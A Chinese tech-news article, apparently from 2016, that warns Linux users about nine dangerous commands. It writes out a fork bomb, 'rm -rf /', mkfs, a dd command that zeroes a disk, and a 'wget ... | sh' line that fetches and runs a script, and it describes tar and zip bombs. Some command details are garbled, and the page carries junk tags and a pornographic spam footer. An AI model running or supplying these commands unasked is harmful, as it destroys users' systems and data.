<dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><small id="yhprb"></small><dfn id="yhprb"></dfn><small id="yhprb"><delect id="yhprb"></delect></small><small id="yhprb"></small><small id="yhprb"></small> <delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"></dfn><dfn id="yhprb"></dfn><s id="yhprb"><noframes id="yhprb"><small id="yhprb"><dfn id="yhprb"></dfn></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><small id="yhprb"></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn> <small id="yhprb"></small><delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn>

新聞中心

EEPW首頁(yè) > 嵌入式系統 > 設計應用 > 9個(gè)必須時(shí)刻警惕的Linux命令&代碼

9個(gè)必須時(shí)刻警惕的Linux命令&代碼

作者: 時(shí)間:2016-09-12 來(lái)源:網(wǎng)絡(luò ) 收藏

概述: shell/terminal命令非常強大,即使一個(gè)簡(jiǎn)單的命令就可能導致文件夾、文件或者路徑文件夾等被刪除。為了避免這樣的事情發(fā)生,我們應該時(shí)刻注意PHP代碼命令,今天為大家帶來(lái)9個(gè)必須時(shí)刻警惕的命令代碼。

本文引用地址:http://dyxdggzs.com/article/201609/304206.htm

shell/terminal命令非常強大,即使一個(gè)簡(jiǎn)單的命令就可能導致文件夾、文件或者路徑文件夾等被刪除。

在一些情況下,Linux甚至不會(huì )詢(xún)問(wèn)你而直接執行命令,導致你丟失各種數據信息。

一般來(lái)說(shuō)在Web上推薦新的Linux用戶(hù)執行這些命令,當然,也有人哪些寫(xiě)過(guò)這代碼的人不這么想,因為這玩意你一寫(xiě)下去就不是玩笑了。

9個(gè)必須時(shí)刻警惕的PHP命令代碼

這里我收集了一些對系統有危害的Linux代碼,幫助你避免他們。請記?。哼@些代碼非常危險,甚至可以經(jīng)過(guò)修改,變得更加有危害性。

還有一些事情需要注意:一些命令只在Ubuntu中有sudo前綴時(shí)是有危害的。其他發(fā)行版本的Linux,則是在作為根目錄命令時(shí)會(huì )有危害。

1. Linux Fork Bomb Command

:(){ :|: };:以Fork Bomb聞名,是一個(gè)拒絕服務(wù)攻擊 的Linux 系統。:(){ :|: };:是一個(gè)bash函數。只要被執行,他會(huì )不斷重復,直到系統被凍結。

你只能重啟系統解決這個(gè)問(wèn)題。所以當你在Linux界面執行這個(gè)命令時(shí)一定要注意。

2. Mv Folder/Dev/Null Command

mv folder/dev/null也是一個(gè)危險的命令。Dev/null 或者 null device 是一個(gè)刪除所有寫(xiě)在這個(gè)設備文件上數據的設備文件,但是,該操作提示卻是寫(xiě)入操作執行成功。這就是我們常說(shuō)的bit bucked 或者 black hole。

3. Rm -Rf Command

rm -rf命令在Linux系統中可以快速刪除文件夾及其內容。如果,你不知道如何正確使用它,你就只有哭了。

列下m-rf 命令最常見(jiàn)的組合和選擇:

rm command :刪除Linux系統的文件

rm -f command:不需提示,刪除文件中的只讀文件

rm -r command 循環(huán)刪除文件夾的內容

rm -d command :刪除空目錄,如果非空目錄則不會(huì )執行該操作

rm -rf/ command:強制刪除根目錄中的所有內容和子文件夾(包括寫(xiě)保護文件)命令。

rm -rf* command :強制刪除當前目錄中的所有內容(當前工作目錄)和字文件夾

rm -rf. command:強制刪除當前文件夾目錄/子目錄中的所有內容 。同rm -r.[^.]*

The rm -r.[^.]* command :刪除文件及文件夾,帶有刪除提示

4. Mkfs Command

如果你不知mkfs的作用,那么它也是一個(gè)危險的命令,mkfs之后寫(xiě)的任何命令都將會(huì )被一個(gè)空白的linux文件系統格式化、替代。

下面列舉出需要管理員權限,格式化硬盤(pán)的命令:

mkfs

mkfs.ext3

mkfs.bfs

mkfs.ext2

mkfs.minix

mkfs.msdos mkfs.reiserfs

mkfs.vfat

mkfs.cramfs也可以和上面的代碼做同樣的事情,不過(guò)不需要管理源權限。

5. Tar Bomb

tar命令用于將多個(gè)文件以.tar格式放入一個(gè)文件中(存檔文件)。Tape Archive (Tar) bomb可以由他創(chuàng )建。

當為壓縮時(shí),就是這個(gè)存檔文件生成數以萬(wàn)計的相似名稱(chēng)文件出現在當前目錄中而不是新目錄。

當收到tar文件,定期創(chuàng )建一個(gè)新的保護目錄,然后在解壓前將接受的tar文件放到這個(gè)目錄中,你可以避免成為tar bomb的受害者。

6. Dd Command

Dd命令用于復制改變硬盤(pán)分區。如果,你用錯地方了,那么也很危險。

下面列舉dd命令:

dd if=/dev/hda of=/dev/hdb

dd if=/dev/hda of=/dev/sdb

dd if=something of=/dev/hda

dd if=something of=/dev/sda

下面這個(gè)命令會(huì )將整個(gè)主硬盤(pán)清零:dd if=/dev/zero of=/dev/had

7. Shell Script Code

有時(shí)候,你可能會(huì )被人坑,給你一個(gè)shell腳本文件,讓你去下載并執行它。該腳本可能會(huì )包含一些惡意的或危險的代碼。命令形式可能會(huì )是這樣:wget http://some_malicious_source -O- | sh。 wget將會(huì )在sh狹隘腳本時(shí)下載腳本。

8. Malicious Source Code

也許有人會(huì )給你源代碼讓你編譯他。代碼可能是正常代碼,不過(guò),有一些惡意代碼偽裝在大型源代碼中,如果是這樣,你的系統就中槍了。如何避免?僅接受并編譯可信賴(lài)來(lái)源的源代碼。

9. Decompression Bomb

你已經(jīng)收到一個(gè)壓縮文件,你被要求提取這個(gè)看起來(lái)很小的文件,可能小到KB。事實(shí)上,該小尺寸的壓縮文件包含高度壓縮數據。

只要文件解壓,上百GB數據會(huì )被提取,這時(shí)候,過(guò)大的數據填滿(mǎn)硬盤(pán)導致宕機,幾率就很大了。



關(guān)鍵詞: Linux 命令&代碼

評論


相關(guān)推薦

技術(shù)專(zhuān)區

關(guān)閉
国产精品自在自线亚洲|国产精品无圣光一区二区|国产日产欧洲无码视频|久久久一本精品99久久K精品66|欧美人与动牲交片免费播放
<dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><small id="yhprb"></small><dfn id="yhprb"></dfn><small id="yhprb"><delect id="yhprb"></delect></small><small id="yhprb"></small><small id="yhprb"></small> <delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"></dfn><dfn id="yhprb"></dfn><s id="yhprb"><noframes id="yhprb"><small id="yhprb"><dfn id="yhprb"></dfn></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><small id="yhprb"></small><dfn id="yhprb"><delect id="yhprb"></delect></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn> <small id="yhprb"></small><delect id="yhprb"><strike id="yhprb"></strike></delect><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn><dfn id="yhprb"><s id="yhprb"><strike id="yhprb"></strike></s></dfn><dfn id="yhprb"><s id="yhprb"></s></dfn>